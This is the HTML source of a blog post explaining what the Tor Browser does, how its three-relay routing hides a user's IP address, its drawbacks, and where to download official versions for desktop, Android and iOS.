<!doctype html><html amp lang="en-us"><head><meta charset="utf-8"><title>How to browse the web anonymously for free - Tor Browser - DeepDarkWeb</title><meta name="description" content="How to browse the web anonymously for free - Tor Browser for Android, iOS (iPhone/iPad), Linux/Unix, macOS and Windows."><meta name="robots" content="index, follow"><link rel="canonical" href="https://DeepDarkWeb.github.io/how-to-browse-the-web-anonymously-for-free-tor-browser/"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet" type="text/css"><script async custom-element="amp-sidebar" src="https://cdn.ampproject.org/v0/amp-sidebar-0.1.js"></script><script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script><script async custom-element="amp-analytics" src="https://cdn.ampproject.org/v0/amp-analytics-0.1.js"></script><script async custom-element="amp-iframe" src="https://cdn.ampproject.org/v0/amp-iframe-0.1.js"></script><script type="application/ld+json">{"@context":"http://schema.org","@type":"Article","mainEntityOfPage":{"@type":"WebPage","@id":"https://DeepDarkWeb.github.io/amp/how-to-browse-the-web-anonymously-for-free-tor-browser/"},"headline":"How to browse the web anonymously for free - Tor Browser","datePublished":"2018-06-13T05:55","dateModified":"2018-06-19T10:25","image":{"@type":"ImageObject","url":"https://DeepDarkWeb.github.io/media/posts/1/Tor-Browser-Icon.jpg","height":512,"width":512},"description":"The easiest, most effective and free way to browse the web anonymously, is to simply use the Tor Browser Bundle. Tor and the Tor Browser are developed and maintained by the non-profit organisation The Tor Project Inc, it is open source and can be downloaded for&hellip;","author":{"@type":"Person","name":"DeepDarkWeb"},"publisher":{"@type":"Organization","name":"DeepDarkWeb"}}</script><style amp-custom>article,
aside,
footer,
header,
hgroup,
main,
nav,
section {
  display: block; }

*,
*:before,
*:after {
  -webkit-box-sizing: content-box;
  box-sizing: content-box;
  margin: 0;
  padding: 0; }

li {
  list-style: none; }

amp-img {
  max-width: 100%; }

button,
input,
select,
textarea {
  font: inherit; }

html {
  font-size: 1rem; }

body {
  background: #f1f1f1;
  color: #262626;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  line-height: 1.6; }

a {
  color:  #26292B;
  text-decoration: none;
  -webkit-transition: all 0.12s linear 0s;
  -o-transition: all 0.12s linear 0s;
  transition: all 0.12s linear 0s; }

a:hover {
  color: #262626;
  text-decoration: underline;
  -webkit-text-decoration-skip: ink;
  text-decoration-skip: ink; }

a:active {
  color: #262626; }

a:focus {
  outline: 2px dotted #26292B; }

figure,
blockquote,
p,
ul,
ol,
dl,
table,
hr,
fieldset {
  margin-top: 1.6rem; }

h1,
h2,
h3,
h4,
h5,
h6 {
  color: #262626;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  font-weight: 500;
  line-height: 1.2;
  margin-top: 2.13333rem; }

h1 {
  font-size: 1.67583rem;
  font-weight: normal; }

h2 {
  font-size: 1.4729rem; }

h3 {
  font-size: 1.29454rem; }

h4 {
  font-size: 1.13778rem; }

h5 {
  font-size: 1rem; }

h6 {
  font-size: 0.87891rem; }

h2 + p,
h3 + p,
h4 + p,
h5 + p,
h6 + p {
  margin-top: 0.8rem; }

b,
strong {
  font-weight: 600; }

blockquote {
  color: #6c7175;
  font-family: "Droid Serif", "Times", "Source Serif Pro", serif;
  font-style: italic;
  padding: 1.33333rem 0.53333rem 1.33333rem 3.2rem;
  position: relative; }
  blockquote:before {
    display: block;
    content: "\201C";
    font-size: 4.41226rem;
    position: absolute;
    left: 0;
    top: -12px;
    color: rgba(108, 113, 117, 0.5); }
  blockquote > :nth-child(1) {
    margin-top: 0; }

ul,
ol {
  margin-left: 2rem; }
  ul > li,
  ol > li {
    list-style: inherit;
    padding: 0 0 0.26667rem 0.26667rem; }

dl dt {
  color: #262626;
  font-weight: 600; }

code,
pre {
  background-color: #f1f1f1;
  font-family: monospace; }

pre {
  margin: 1.6rem 0 0;
  padding: 1.6rem;
  white-space: pre-wrap;
  word-wrap: break-word;
  overflow-x: auto; }
  pre > code {
    color: #262626;
    padding: 0; }

code {
  border-radius: 3px;
  color: #262626;
  padding: 0.26667rem 0.53333rem; }

table {
  border-collapse: collapse;
  border-spacing: 0;
  border: 1px solid #d4d4d4;
  width: 100%;
  overflow-x: auto;
  vertical-align: top;
  text-align: left;
  white-space: nowrap; }
  table th {
    font-weight: 500;
    padding: 0.53333rem 1.06667rem; }
  table tr {
    border-bottom: 1px solid #d4d4d4; }
    table tr:nth-child(2n) {
      background: #f1f1f1; }
  table td {
    padding: 0.53333rem 1.06667rem; }

figcaption {
  clear: both;
  color: rgba(108, 113, 117, 0.6);
  font-size: 0.82397rem;
  margin: 0.8rem 0 0;
  text-align: center; }

sub,
sup {
  font-size: 65%; }

hr {
  border: 0;
  height: 0;
  border-top: 1px solid rgba(0, 0, 0, 0.1);
  border-bottom: 1px solid rgba(255, 255, 255, 0.3); }

.btn, [type=button],
[type=submit],
button {
  background: #26292B;
  border: none;
  border-radius: 2px;
  color: #ffffff;
  cursor: pointer;
  display: inline-block;
  font-size: 0.87891rem;
  font-weight: 500;
  line-height: 1.9;
  padding: 0.53333rem 1.33333rem;
  text-align: center;
  text-decoration: none;
  -webkit-transition: all .15s ease;
  -o-transition: all .15s ease;
  transition: all .15s ease;
  width: auto; }
  .btn:hover, [type=button]:hover,
  [type=submit]:hover,
  button:hover {
    background: #262626;
    color: #ffffff; }
  .btn:focus, [type=button]:focus,
  [type=submit]:focus,
  button:focus {
    outline: none; }
  .btn-outline {
    border: 1px solid #ddd;
    background: #ffffff;
    border-radius: 3px;
    color: #262626; }

[type=button],
[type=submit],
button {
  text-transform: uppercase;
  -webkit-appearance: none;
  -moz-appearance: none; }

.navbar {
  background: #26292B;
  -webkit-box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.2);
  box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.2);
  line-height: 3;
  max-height: 4rem; }
  .navbar > div {
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-pack: center;
    -ms-flex-pack: center;
    justify-content: center;
    text-align: left;
    max-width: 700px;
    margin: 0 auto; }
  .navbar a {
    color: #ffffff;
    text-decoration: none; }
  .navbar-sidebar-toggle {
    left: 0;
    position: relative;
    text-indent: -99999rem; }
    .navbar-sidebar-toggle:before {
      content: "";
      display: block;
      border-top: 0.375rem double #ffffff;
      border-bottom: 0.125rem solid #ffffff;
      height: 0.125rem;
      position: absolute;
      text-indent: 0;
      top: 50%;
      width: 1.3rem;
      -webkit-transform: translate(0px, -50%);
      -ms-transform: translate(0px, -50%);
      transform: translate(0px, -50%); }


.logo {
            display: inline-block;
  font-weight: 600;
  line-height: 1;
            margin: 0 auto;
            height: 2rem;
            text-indent: -9999px;
            width: 240px;vertical-align: middle;
        }
        .logo.logo-text {
            line-height: 2;
            text-align: center;
            text-indent: 0;
        }

amp-sidebar {
  background: #ffffff;
  width: 240px; }
  amp-sidebar > ul {
    margin: 0.8rem 0 0;
    padding: 0; }
    amp-sidebar > ul ul {
      border-left: 1px solid #d4d4d4;
      margin: 0.53333rem 0 0; }
    amp-sidebar > ul li {
      color: #262626;
      font-size: 0.9375rem;
      font-weight: 600;
      list-style: none;
      line-height: 1.4;
      padding: 0.42667rem 1.06667rem; }
      amp-sidebar > ul li li {
        font-weight: normal;
        padding: 0.26667rem 0 0.26667rem 1.06667rem; }
    amp-sidebar > ul a,
    amp-sidebar > ul a:visited {
      color: #262626; }

.bg-white {
  background: #ffffff; }

.wrap-page {
  max-width: 700px;
  margin: 0 auto; }

@media all and (max-width: 43.6875em) {
  .wrap-inner {
    padding: 0 6%; } }

.page-title {
  background: #ffffff;
  -webkit-box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  margin-bottom: 0.8rem;
  padding: 1.6rem 6%; }
  .page-title > h1 {
    margin: 0;
    font-size: 1.29454rem; }
  .page-title > p {
    font-size: 0.87891rem;
    color: #6c7175;
    line-height: 1.3;
    margin: 0.26667rem 0 0; }
  .page-title-author {
    border-radius: 50%;
    float: left;
    height: 2.5rem;
    width: 2.5rem; }
    .page-title-author + h1 {
      margin-left: 3.5rem; }
      .page-title-author + h1 + p {
        margin-left: 3.5rem; }

.card {
  background: #ffffff;
  -webkit-box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  margin-bottom: 0.8rem;
  padding-bottom: 1.06667rem; }

  .card-meta {
    border-top: 1px solid #d4d4d4;
    color: rgba(108, 113, 117, 0.6);
    font-size: 0.7242rem;
    font-weight: 500;
    margin-top: 1.06667rem;
    padding-top: 1.06667rem;
    text-transform: uppercase; }
    .card-meta a + time:before {
      content: "";
      background: #d4d4d4;
      display: inline-block;
      height: 3px;
      margin: 0 8px;
      width: 3px;
      vertical-align: middle;
      border-radius: 50%; }
  .card-text {
    font-size: 0.9375rem;
    overflow: hidden;
    padding: 0 6%; }
    .card-text h2 {
      font-size: 1.13778rem; }

.post {
  margin-bottom: 2.13333rem; }
  .post-featured-image {
    margin-top: 0;
    position: relative; }
    .post-featured-image > figcaption {
      background: rgba(0, 0, 0, 0.5);
      border-radius: 3px;
      color: #ffffff;
      position: absolute;
      bottom: 0.8rem;
      padding: 0 0.26667rem;
      right: 6%; }
  .post-header {
    margin-bottom: 2.13333rem; }
  .post-meta {
    border-bottom: 1px solid #d4d4d4;
    color: rgba(108, 113, 117, 0.6);
    font-size: 0.7242rem;
    font-weight: 500;
    margin-top: 1.06667rem;
    padding-bottom: 1.06667rem;
    text-transform: uppercase; }
    .post-meta a + time:before {
      content: "";
      background: #d4d4d4;
      display: inline-block;
      height: 3px;
      margin: 0 8px;
      width: 3px;
      vertical-align: middle;
      border-radius: 50%; }
  .post-tag {
    margin: 0; }
    .post-tag > li {
      display: inline-block;
      padding: 0; }
      .post-tag > li a {
        background: #f1f1f1;
        border-radius: 2px;
        color: #6c7175;
        font-size: 0.77248rem;
        display: inline-block;
        margin: 0 0.26667rem 0.26667rem 0;
        padding: 0.26667rem 0.53333rem; }
        .post-tag > li a:hover {
          background: #26292B;
          color: #ffffff;
          text-decoration: none; }
  .post-share {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-direction: row;
    flex-direction: row;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: space-between;
    margin-top: 1.6rem;
    width: 100%; }
    .post-share amp-social-share {
      -webkit-box-flex: 1;
      -ms-flex: 1 0 auto;
      flex: 1 0 auto;
      background-size: 24px; }
  .post-scroll {
    color: #ffffff;
    background: #26292B;
    bottom: 10px;
    border-radius: 50%;
    border: none;
    -webkit-box-shadow: 0 1px 1.5px 0 rgba(38, 38, 38, 0.12), 0 1px 1px 0 rgba(38, 38, 38, 0.24);
    box-shadow: 0 1px 1.5px 0 rgba(38, 38, 38, 0.12), 0 1px 1px 0 rgba(38, 38, 38, 0.24);
    font-size: 1.13778rem;
    height: 46px;
    opacity: 0;
    outline: none;
    position: fixed;
    padding: 0;
    right: 4%;
    visibility: hidden;
    width: 46px;
    z-index: 9999; }
    .post-scroll-marker {
      height: 0px;
      position: absolute;
      top: 100px;
      width: 0px; }
        .post-pagination {
    background: #f1f1f1;
    -webkit-box-shadow: inset 0 2px 3px rgba(38, 38, 38, 0.1);
    box-shadow: inset 0 2px 3px rgba(38, 38, 38, 0.1);
    border-top: 1px solid #d4d4d4;
    padding: 1.06667rem 0; }
    .post-pagination > div {
      line-height: 1.2;
      padding: 0.53333rem 1.06667rem;
      text-align: center; }
      .post-pagination > div span {
        display: block;
        color: #6c7175;
        font-size: 0.7242rem;
        font-weight: 500;
        margin-bottom: 0.26667rem;
        text-transform: uppercase; }
    .post-pagination-prev a:before {
      content: "\2190";
      margin-right: 0.26667rem; }
    .post-pagination-next a:after {
      content: "\2192";
      margin-left: 0.26667rem; }

aside {
  margin: 1.6rem 0 0; }

.align-left {
  text-align: left; }

.align-right {
  text-align: right; }

.align-center {
  text-align: center; }

.align-justify {
  text-align: justify; }

.msg {
  border-left: 2px solid transparent;
  padding: 1.06667rem 1.06667rem; }
  .msg--highlight {
    background-color: #fff8e6;
    border-color: #e2ac4f; }
  .msg--info {
    background: rgba(45, 97, 201, 0.03);
    border-color: #26292B; }
  .msg--success {
    background: #f7fbf6;
    border-color: #5ab44b; }
  .msg--warning {
    background: #fff3f3;
    border-color: #c06367;
    color: #a94442; }

.dropcap:first-letter {
  float: left;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  font-size: 2.16943rem;
  line-height: 0.7;
  margin-right: 0.53333rem;
  padding: 0.53333rem 0.53333rem 0.53333rem 0; }

.pagination {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: justify;
  -ms-flex-pack: justify;
  justify-content: space-between;
  margin: 0.8rem 0; }
  .pagination > a {
    padding-left: 0;
    padding-right: 0;
    width: 49%; }
  .pagination-right {
    margin-left: auto; }

.bottom {
  background: #26292B;
  color: #ffffff;
  padding: 1.06667rem 4%;
  text-align: center; }</style><style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript><script async src="https://cdn.ampproject.org/v0.js"></script><script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script><script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script></head><body class="bg-white"><nav class="navbar wrap-inner" id="top"><div><a on="tap:navbar-sidebar.toggle" class="navbar-sidebar-toggle" title="Menu">Menu</a> <a class="logo logo-text" href="https://DeepDarkWeb.github.io/amp">DeepDarkWeb</a></div></nav><main class="wrap-page"><article class="post"><figure class="post-featured-image"><amp-img src="https://DeepDarkWeb.github.io/media/posts/1/Tor-Browser-Icon.jpg" alt="How to browse the web anonymously for free - Tor Browser - DeepDarkWeb" srcset="https://DeepDarkWeb.github.io/media/posts/1/responsive/Tor-Browser-Icon-xs.jpg 300w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Tor-Browser-Icon-sm.jpg 480w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Tor-Browser-Icon-md.jpg 768w" sizes="(max-width: 768px) 100vw, 768px" height="512" layout="responsive" width="512"></amp-img></figure><div class="wrap-inner"><header class="post-header"><h1>How to browse the web anonymously for free - Tor Browser</h1></header><p>The easiest, most effective and free way to browse the web anonymously, is to simply use the Tor Browser Bundle. </p><p>Tor and the Tor Browser are developed and maintained by the non-profit organisation <a href="https://en.wikipedia.org/wiki/The_Tor_Project,_Inc" title="The Tor Project Inc - Wikipedia " target="_blank" rel="noopener noreferrer">The Tor Project Inc</a>, it is open source and can be downloaded for free from the Tor Project website.</p><figure class="post__image--center"> <amp-img src="https://DeepDarkWeb.github.io/media/posts/1/Tor-Browser-Icon.jpg" sizes="(max-width: 48em) 100vw, 768px" srcset="https://DeepDarkWeb.github.io/media/posts/1/responsive/Tor-Browser-Icon-xs.jpg 300w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Tor-Browser-Icon-sm.jpg 480w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Tor-Browser-Icon-md.jpg 768w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Tor-Browser-Icon-lg.jpg 1024w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Tor-Browser-Icon-xl.jpg 1360w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Tor-Browser-Icon-2xl.jpg 1600w" alt="Tor Browser Bundle Icon - Anonymous web browsing" width="250" height="250" layout="responsive"></amp-img></figure><p><strong>Features of the Tor Browser:</strong></p><ul><li>Hide your real IP address from websites you visit.</li><li>Hide your browsing and online activities from ISPs, insecure wireless networks (public WiFi hotspots), and governments.</li><li>Access websites, even behind internet filters and censors. (Circumvent censorship)</li><li>Visit .onion websites (the "<a href="https://en.wikipedia.org/wiki/Darknet" title="Darknet - Wikipedia" target="_blank" rel="noopener noreferrer">darknet</a>" of hidden sites/services) only accessible using Tor.</li><li>Prevent online tracking</li><li>Prevent geo-blocking</li><li>Protect your life</li><li>Protect your freedom</li><li>Protect your wallet</li></ul><p> </p><p>The Tor Browser is available for all operating systems (macOS, Windows, Linux/Unix, and Android).</p><p><a href="https://onionbrowser.com/" title="The Onion Browser App for iOS" target="_blank" rel="noopener noreferrer">The Onion Browser App for iOS</a> is an unofficial Version of the Tor Browser, which is also open source, available for free and mentioned on the Tor project website as an alternative for the official Tor Browser on iOS (iPhone and iPad). (<a href="https://trac.torproject.org/projects/tor/wiki/org/teams/CommunityTeam/Support#CanIrunToronaniOSdevice" title="Read about Onion Browser on the Tor Project site and on the official Tor Project blog." target="_blank" rel="noopener noreferrer">Read about Onion Browser on the Tor Project site and on the official Tor Project blog</a>.)</p><p>The official Tor Browser is based on Mozilla's FireFox Browser and hides the identity and location (IP address) of the user from all the websites he or she visits. Tor makes it also impossible for your ISP, government, hackers or data mining companies (i.e. ad tracking) or anyone else who might monitor your internet activities, to see and record which websites you visit.</p><p>Beside hiding the IP and location of the user, the Tor Browser also makes it possible to visit websites that are blocked and censored in certain regions/countries.</p><p>Another feature of the Tor Browser is that it makes it possible to visit .onion addresses/domains. </p><p>Onion sites, or Hidden Services, aka Darknet websites are websites that run within the Tor network, thus making it pretty much impossible to detect the location of the server nor the operator.</p><p>Even Facebook started to provide an .onion address for its social network.  </p><p>Facebook's .onion site: <a href="https://facebookcorewwwi.onion" title="Facebook's onion site address">https://facebookcorewwwi.onion</a></p><p>Obviously, the reason for that, was of course not because Facebook itself wanted to hide its identity/server location but instead wanted to provide its users in supressive regimes a way to access the platform even if it is actually blocked or heavily monitored by the government.</p><p><span><strong>How does Tor work/hide your identity:</strong></span></p><p>This is the usual connections when you visit a website from your device:</p><p>Your device (computer/smartphone/tablet) -&gt; Server of your ISP -&gt; Server that hosts the website/service you want to access</p><p>In this way your ISP sees (and in many countries records) all the websites you visit and when you visit them. Also the websites/services you visit see your IP (and could keep a record of it). On top of that all sorts of online tracking companies/ad companies see and record which websites you visited. </p><p>And this is the way Tor hides your identity:</p><p>Your device -&gt; Server of your ISP -&gt; 1. Tor server -&gt; 2. Tor server -&gt; 3. Tor server -&gt; Server that hosts the website/service you want to access</p><p>Simplyfied, Tor ads 3 more hops of servers to your connection between the server of your ISP and the website/service you'd like to access.</p><p>During this connection your ISP could only see that you connected to a Tor server (the 1. Tor server), but not where you connection goes from there.</p><p>The 1. Tor server sees you IP address but doesn't know the website you are actually visiting.</p><p>The 2. Tor server only knows the 1. Tor Server and not your IP address and also not which website/service you are visiting.</p><p>The 3. Tor server (also called exit node) only knows the destination website/service but doesn't know who you are.</p><p>All the traffic to and within Tor is encrypted, so no Tor server can read the data you are sending. </p><p>The traffic between the 3. Tor server (exit node) and the final destination (i.e. a website) is encrypted over TLS/SSL (HTTPS) and the Tor Browser default extension "HTTPS-Everywhere" ensures that you connect to websites over a secure HTTPS connection.</p><p><strong>Attention</strong>: Don't send sensitve data (i.e. passwords) over a non-HTTPS encrypted connections. This would be as insecure/privat as a postcard</p><p><strong>You don't need to pay attention to a HTTPS connection when you visit .onion sites</strong> with the Tor browser, since Tor takes already care of all the encryption <strong>within the Tor network.</strong></p><p>The EFF provided some pretty much selfexplaining ilustrations about how the Tor Browser Bundle works and from what it protects you:</p><p class="align-center">Browsing the web <strong>without the Tor Browser </strong>Bundle and<strong> without HTTPS</strong>:</p><figure class="post__image--full"><amp-img src="https://DeepDarkWeb.github.io/media/posts/1/Browsing-the-web-without-the-Tor-Browser-Bundle-and-without-HTTPS.jpg" sizes="(max-width: 48em) 100vw, 768px" srcset="https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-and-without-HTTPS-xs.jpg 300w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-and-without-HTTPS-sm.jpg 480w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-and-without-HTTPS-md.jpg 768w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-and-without-HTTPS-lg.jpg 1024w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-and-without-HTTPS-xl.jpg 1360w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-and-without-HTTPS-2xl.jpg 1600w" alt="Browsing the web without the Tor Browser Bundle and without HTTPS" width="1116" height="876" layout="responsive"></amp-img></figure><p class="align-center"> </p><p class="align-center">Browsing the web without the Tor Browser Bundle but<strong> with HTTPS</strong>:</p><figure class="post__image--full"><amp-img src="https://DeepDarkWeb.github.io/media/posts/1/Browsing-the-web-without-the-Tor-Browser-Bundle-but-with-HTTPS.jpg" sizes="(max-width: 48em) 100vw, 768px" srcset="https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-but-with-HTTPS-xs.jpg 300w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-but-with-HTTPS-sm.jpg 480w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-but-with-HTTPS-md.jpg 768w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-but-with-HTTPS-lg.jpg 1024w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-but-with-HTTPS-xl.jpg 1360w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-without-the-Tor-Browser-Bundle-but-with-HTTPS-2xl.jpg 1600w" alt="Browsing the web without the Tor Browser Bundle but with HTTPS" width="1119" height="879" layout="responsive"></amp-img></figure><p class="align-center"> </p><p class="align-center">Browsing the web <strong>with the Tor Browser</strong> Bundle and<strong> with HTTPS</strong>: </p><figure class="post__image--full"><amp-img src="https://DeepDarkWeb.github.io/media/posts/1/Browsing-the-web-with-the-Tor-Browser-Bundle-and-with-HTTPS.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-with-the-Tor-Browser-Bundle-and-with-HTTPS-xs.png 300w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-with-the-Tor-Browser-Bundle-and-with-HTTPS-sm.png 480w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-with-the-Tor-Browser-Bundle-and-with-HTTPS-md.png 768w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-with-the-Tor-Browser-Bundle-and-with-HTTPS-lg.png 1024w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-with-the-Tor-Browser-Bundle-and-with-HTTPS-xl.png 1360w ,https://DeepDarkWeb.github.io/media/posts/1/responsive/Browsing-the-web-with-the-Tor-Browser-Bundle-and-with-HTTPS-2xl.png 1600w" alt="Browsing the web with the Tor Browser Bundle and with HTTPS" width="1118" height="876" layout="responsive"></amp-img></figure><p class="align-center"> </p><p><strong>Drawbacks of using Tor/the Tor Browser Bundle:</strong></p><ul><li>Obviously you connection speed will suffer a bit because of the additional server hops. But most of the time this is hardly noticeble.</li><li>Tor only supports TCP connections, which is fine since this is all you need for normal web browsing.</li><li>For additional security some browser features (i.e. WebRTC, flash player) are disabled in the Tor Browser. (But are still supported in general over Tor.)</li><li>BitTorrent/Torrenting over Tor is basically impossible - at least it is a waste of time to even try that.</li><li>Some websites require an additional verification i.e. in form of captchas if they detect that a visitor is using Tor.</li></ul><p> </p><p><strong>Recommendation: </strong>Try to use the Tor Browser Bundle instead of Safari, Chrome or Firefox as often as possible and only use your standard browser for websites that don't work properly within the Tor Browser.</p><p> </p><p><span><strong>Latest release download links for Tor:</strong></span></p><p><span><strong>Tor Browser for Windows, macOS and Linux/Unix:</strong></span></p><p>Official Tor Browser download links from the Tor Project website for Microsoft Windows, Apple macOS and Linux:</p><p><a href="https://www.torproject.org/download/download-easy.html.en" title="Official Tor Browser Download Link" target="_blank" rel="noopener noreferrer">Official Tor Browser Download Link</a> (Windows, Mac and Linux)</p><p>You only need the Tor Browser to browse the web anonymously from your Desktop/Laptop.</p><p> </p><p><span><strong>Tor Browser for Android:</strong></span></p><p><a href="https:/guardianproject.info/apps/orbot/?src=tbb_download" title="Tor for Android Download " target="_blank" rel="noopener noreferrer">The Guardian Project </a>develops and maintains the Tor app (Orbot) and Tor Browser app (Orfox) for Android.</p><p>You need both apps to use Tor for anonymous internet browsing.</p><p>Orbot provides access to Tor on Android in general, and Orfox is the browser which makes it possible to visit Websites anonymously over Tor on Android. Both have to be installed and running simultaneously. With Orbot you can also make other apps on your Android device run over Tor, for instance a Twitter client or XMPP messenger.</p><p> </p><p><span><strong>Download Tor for Android - Orbot:</strong></span></p><p><a href="https://market.android.com/details?id=org.torproject.android" title="Download Tor for Android - Orbot from Google Play " target="_blank" rel="noopener noreferrer">Download Tor for Android - Orbot from Google Play</a></p><p><a href="https://guardianproject.info/fdroid" title="Download Tor for Android - Orbot from F-Droid" target="_blank" rel="noopener noreferrer">Download Tor for Android - Orbot from F-Droid</a></p><p><a href="https://guardianproject.info/releases/orbot-latest.apk" title="Download Tor for Android - Orbot Direct Download (.apk)" target="_blank" rel="noopener noreferrer">Download Tor for Android - Orbot Direct Download (.apk)</a></p><p> </p><p><span><strong>Download Tor for Android - Orfox:</strong></span> </p><p><a href="https://play.google.com/store/apps/details?id=info.guardianproject.orfox" title="Download Tor Browser for Android - Orfox from Google Play." target="_blank" rel="noopener noreferrer">Download Tor Browser for Android - Orfox from Google Play</a></p><p><a href="https://guardianproject.info/fdroid" title="Download Tor Browser for Android - Orfox from F-Droid." target="_blank" rel="noopener noreferrer">Download Tor Browser for Android - Orfox from F-Droid</a></p><p> </p><p><span><strong>Download Tor for iOS (iPhone and iPad) - Onion Browser:</strong></span></p><p><a href="https://itunes.apple.com/us/app/onion-browser/id519296448?mt=8&amp;at=10l9R4" title="Download Tor for iOS (iPhone and iPad) - Onion Browser from Apple App Store " target="_blank" rel="noopener noreferrer">Download Tor Browser for iOS (iPhone and iPad) - Onion Browser from the Apple App Store.</a></p><p> </p><p><span><strong>Important: </strong></span></p><ul><li><strong>ONLY</strong> use the above listed apps to use Tor on your device! And <strong>ONLY</strong> download them from the official sources! Other apps (or downloads from other sources) are most likely insecure, contain malware or are simply a rip-off (if they cost money).</li><li><strong>Keep the Tor Browser/Orbot/Orfox/Onion Browser up to date!</strong> Install updates as soon as they are available.</li></ul><p>If you end up using Tor / The Tor Browser Bundle regularly (which you should), consider donating to The Tor Project to keep the development alive:</p><ul><li><strong><a href="https://donate.torproject.org/pdr" title="Donate to the Tor Project." target="_blank" rel="noopener noreferrer">Donate to the Tor Project.</a></strong></li><li><strong><a href="https://onionbrowser.com/#support-project" title="Donate to the Onion Browser for iOS Project." target="_blank" rel="noopener noreferrer">Donate to the Onion Browser for iOS Project.</a></strong></li></ul><aside><ul class="post-tag"><li><a href="https://DeepDarkWeb.github.io/amp/tags/privacy/">Privacy</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/tor/">Tor</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/tor-browser/">Tor Browser</a></li></ul><div class="post-share"><amp-social-share type="system" width="40" height="40" data-param-text="How to browse the web anonymously for free - Tor Browser"></amp-social-share><amp-social-share type="twitter" width="40" height="40" data-param-text="How to browse the web anonymously for free - Tor Browser" data-param-url="https://DeepDarkWeb.github.io/amp/how-to-browse-the-web-anonymously-for-free-tor-browser/"></amp-social-share><amp-social-share type="whatsapp" width="40" height="40" data-param-text="How to browse the web anonymously for free - Tor Browser"></amp-social-share></div></aside></div></article><nav class="post-pagination wrap-inner"><div class="post-pagination-next"><span>Next Post</span> <a href="https://DeepDarkWeb.github.io/amp/how-to-install-tor-on-macos-tutorial/">How to install Tor on macOS - Tutorial</a></div></nav></main><amp-animation id="showAnim" layout="nodisplay"><script type="application/json">{
                    "duration": "200ms",
                    "fill": "both",
                    "iterations": "1",
                    "direction": "alternate",
                    "animations": [{
                        "selector": ".post-scroll",
                        "keyframes": [{
                            "opacity": "1",
                            "visibility": "visible",
                            "transform": "scale(1)"
                        }]
                    }]
                }</script></amp-animation><amp-animation id="hideAnim" layout="nodisplay"><script type="application/json">{
                    "duration": "200ms",
                    "fill": "both",
                    "iterations": "1",
                    "direction": "alternate",
                    "animations": [{
                        "selector": ".post-scroll",
